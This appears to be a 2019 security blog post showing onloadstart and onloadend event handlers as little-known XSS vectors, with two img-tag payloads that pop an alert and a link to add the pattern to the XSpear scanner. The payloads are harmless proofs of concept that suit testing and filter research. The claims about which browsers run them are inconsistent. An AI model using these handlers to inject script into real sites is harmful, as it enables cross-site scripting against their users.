8/04/2019

onload*(start/end) event handler XSS(Any browser)

Hi hackers.
Last time I wrote about onpointer * xss, I write a not well-known event-handle for xss now.
(https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection.html)

onload* event handler for XSS

it’s onload* handler!
Handlers that usually start with onload are well known, but onloadstart and onloadend are not well known.

<!-- onloadstart -->
<!-- Any browser, but not use <img> tag.. -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">

<!-- onloadend -->
<!-- only firefox -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">

onloadstar tested my site. it's work!


But, just only in Firefox.

for XSpear

add eventhandler pattern!
https://github.com/hahwul/XSpear/issues/18

You're welcome
(img refer giphy.com)




HAHWUL

@hahwul
Share: | Coffee Me: